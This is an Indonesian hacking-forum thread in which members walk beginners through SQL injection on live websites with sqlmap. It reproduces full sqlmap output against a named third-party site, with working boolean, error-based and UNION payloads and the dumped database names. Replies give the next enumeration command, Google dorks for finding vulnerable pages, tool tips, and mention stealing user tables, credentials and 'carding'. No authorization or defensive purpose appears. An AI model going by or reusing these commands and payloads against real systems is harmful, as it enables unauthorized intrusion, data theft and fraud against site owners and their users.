SQLi Sqlmap.py
(08-27-2012, 01:46 AM)black.oenta Wrote: om kalo keluar biji gini terus diapain om...
Code:
root@bt:/pentest/database/sqlmap# python sqlmap.py -u https://www.marshalls.ky/vehicles.php?id=4 --dbs

    sqlmap/1.0-dev-25eca9d - automatic SQL injection and database takeover tool
    http://sqlmap.org

[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 00:29:58

[00:29:59] [INFO] testing connection to the target url
[00:30:03] [INFO] testing if the url is stable, wait a few seconds
[00:30:06] [INFO] url is stable
[00:30:06] [INFO] testing if GET parameter 'id' is dynamic
[00:30:08] [INFO] confirming that GET parameter 'id' is dynamic
[00:30:10] [INFO] GET parameter 'id' is dynamic
[00:30:15] [WARNING] reflective value(s) found and filtering out
[00:30:15] [INFO] heuristic test shows that GET parameter 'id' might be injectable (possible DBMS: MySQL)
[00:30:15] [INFO] testing for SQL injection on GET parameter 'id'
[00:30:15] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[00:30:28] [INFO] GET parameter 'id' is 'AND boolean-based blind - WHERE or HAVING clause' injectable
[00:30:28] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[00:30:30] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause' injectable
[00:30:30] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[00:30:33] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[00:30:40] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[00:30:40] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other injection technique found
[00:30:44] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[00:30:53] [INFO] target url appears to have 6 columns in query
[00:31:04] [INFO] GET parameter 'id' is 'MySQL UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
sqlmap identified the following injection points with a total of 18 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=4 AND 5882=5882

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=4 AND (SELECT 3755 FROM(SELECT COUNT(*),CONCAT(0x3a6d64763a,(SELECT (CASE WHEN (3755=3755) THEN 1 ELSE 0 END)),0x3a6373653a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 6 columns
    Payload: id=4 LIMIT 1,1 UNION ALL SELECT NULL, CONCAT(0x3a6d64763a,0x535a776a6e4c76454e49,0x3a6373653a), NULL, NULL, NULL, NULL#
---

[00:31:16] [INFO] the back-end DBMS is MySQL

web application technology: PHP 5.3.13, Apache
back-end DBMS: MySQL 5.0
[00:31:16] [INFO] fetching database names
[00:31:18] [INFO] the SQL query used returns 2 entries
[00:31:20] [INFO] retrieved: "information_schema"
[00:31:22] [INFO] retrieved: "marshal_db"
available databases [2]:                                                      
[*] information_schema
[*] marshal_db

[00:31:22] [INFO] fetched data logged to text files under '/pentest/database/sqlmap/output/www.marshalls.ky'

[*] shutting down at 00:31:22

mohon bantuannya
terus dicari isi Tabels dan colum nya berdasarkan nama Dbnya.. Angel

(08-27-2012, 03:50 AM)budi hatory Wrote:
(08-27-2012, 01:46 AM)black.oenta Wrote: om kalo keluar biji gini terus diapain om...
Code:
root@bt:/pentest/database/sqlmap# python sqlmap.py -u https://www.marshalls.ky/vehicles.php?id=4 --dbs

    sqlmap/1.0-dev-25eca9d - automatic SQL injection and database takeover tool
    http://sqlmap.org

[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 00:29:58

[00:29:59] [INFO] testing connection to the target url
[00:30:03] [INFO] testing if the url is stable, wait a few seconds
[00:30:06] [INFO] url is stable
[00:30:06] [INFO] testing if GET parameter 'id' is dynamic
[00:30:08] [INFO] confirming that GET parameter 'id' is dynamic
[00:30:10] [INFO] GET parameter 'id' is dynamic
[00:30:15] [WARNING] reflective value(s) found and filtering out
[00:30:15] [INFO] heuristic test shows that GET parameter 'id' might be injectable (possible DBMS: MySQL)
[00:30:15] [INFO] testing for SQL injection on GET parameter 'id'
[00:30:15] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[00:30:28] [INFO] GET parameter 'id' is 'AND boolean-based blind - WHERE or HAVING clause' injectable
[00:30:28] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[00:30:30] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause' injectable
[00:30:30] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[00:30:33] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[00:30:40] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[00:30:40] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other injection technique found
[00:30:44] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[00:30:53] [INFO] target url appears to have 6 columns in query
[00:31:04] [INFO] GET parameter 'id' is 'MySQL UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
sqlmap identified the following injection points with a total of 18 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=4 AND 5882=5882

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=4 AND (SELECT 3755 FROM(SELECT COUNT(*),CONCAT(0x3a6d64763a,(SELECT (CASE WHEN (3755=3755) THEN 1 ELSE 0 END)),0x3a6373653a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 6 columns
    Payload: id=4 LIMIT 1,1 UNION ALL SELECT NULL, CONCAT(0x3a6d64763a,0x535a776a6e4c76454e49,0x3a6373653a), NULL, NULL, NULL, NULL#
---

[00:31:16] [INFO] the back-end DBMS is MySQL

web application technology: PHP 5.3.13, Apache
back-end DBMS: MySQL 5.0
[00:31:16] [INFO] fetching database names
[00:31:18] [INFO] the SQL query used returns 2 entries
[00:31:20] [INFO] retrieved: "information_schema"
[00:31:22] [INFO] retrieved: "marshal_db"
available databases [2]:                                                      
[*] information_schema
[*] marshal_db

[00:31:22] [INFO] fetched data logged to text files under '/pentest/database/sqlmap/output/www.marshalls.ky'

[*] shutting down at 00:31:22

mohon bantuannya
terus dicari isi Tabels dan colum nya berdasarkan nama Dbnya.. Angel

Yap ..

python sqlmap.py -u (url) -D marshal_db --tables

dst

Smile
Wanna Be A Hero But I'am start from ZERO

(08-30-2011, 05:10 PM)Veronochi Wrote: kalo untuk di pingun bisa menggunakan DarkJumper buatan Mywisdom...
kalo Software X-code biasanya di Gunain di jendela tapi temen ane Pake Di Linux tapi ane kgk tau dia make Wine Versi berapa??

banyak kali om Dork SQLi

contoh:
inurl://index.php?id=
inirl://catagory.php?id=
inurl://.php?id=

dan masih banyak lainnya...

Kalau menggunakan dork seperti ini prosesnya seperti untung-untung berhadiah Om.
Btw ada cara yang lebih cepat ga?

(09-08-2012, 08:18 PM)blAnk_pag3 Wrote:
(08-30-2011, 05:10 PM)Veronochi Wrote: kalo untuk di pingun bisa menggunakan DarkJumper buatan Mywisdom...
kalo Software X-code biasanya di Gunain di jendela tapi temen ane Pake Di Linux tapi ane kgk tau dia make Wine Versi berapa??

banyak kali om Dork SQLi

contoh:
inurl://index.php?id=
inirl://catagory.php?id=
inurl://.php?id=

dan masih banyak lainnya...

Kalau menggunakan dork seperti ini prosesnya seperti untung-untung berhadiah Om.
Btw ada cara yang lebih cepat ga?

semuanya perlu usaha bro... cobai satu per satu Big Grin

ijin praktekin ya om Smile
thx for share Big Grin

mantep nih buat nubi, singkat paha dan jelas.. yg jdi masalah, ketika udh masuk ke dbs, langkah selanjutnya apa???

(10-03-2012, 12:34 AM)rivalcorps Wrote: mantep nih buat nubi, singkat paha dan jelas.. yg jdi masalah, ketika udh masuk ke dbs, langkah selanjutnya apa???

yaw terserah bro, biasanya merambat ke tabel yg berisi info mengenai user. :d atau yg lebih parah bisa bisa buat carding.

misal nih data salah satu tabel ada yang sampe 25rb...
gimana caranya kalo yang diambil itu cuma mulai data ke 24000 s/d terakhir.
jadi tidak semua data dalam tabel tersebut di ambil.

mohon pencerahannya dunk

Om saya pernah dapat username+passnya, tapi sayang admin pagenya ga ketemu, padahal usah pake script buatan orang luar...

Pernah juga saya dapat, username+passwordnya kosong..
maksudnya apa tuh..?
(09-08-2012, 08:18 PM)blAnk_pag3 Wrote:
(08-30-2011, 05:10 PM)Veronochi Wrote: kalo untuk di pingun bisa menggunakan DarkJumper buatan Mywisdom...
kalo Software X-code biasanya di Gunain di jendela tapi temen ane Pake Di Linux tapi ane kgk tau dia make Wine Versi berapa??

banyak kali om Dork SQLi

contoh:
inurl://index.php?id=
inirl://catagory.php?id=
inurl://.php?id=

dan masih banyak lainnya...

Kalau menggunakan dork seperti ini prosesnya seperti untung-untung berhadiah Om.
Btw ada cara yang lebih cepat ga?

Coba pake xsser Om..

sorry sblmnya klu membuat prtanyaan yg bodoh, mklum om msi pmula bnget in om

di tutor di ats d ktkan trlbih dhulu utk mncri web yg ad cela atau mncri sqlinya, yg jdi prtnyaan gmna cara mncri sqli trsbut? ap mnggunakan tool yg ad d BT? mohon dbri ptnjkx om? klu bisa kse tutor nya om?

mhn bntuannya om, mklum bru smnggu gnkan backtrack in om
trima ksih sblmnya






Users browsing this thread: 1 Guest(s)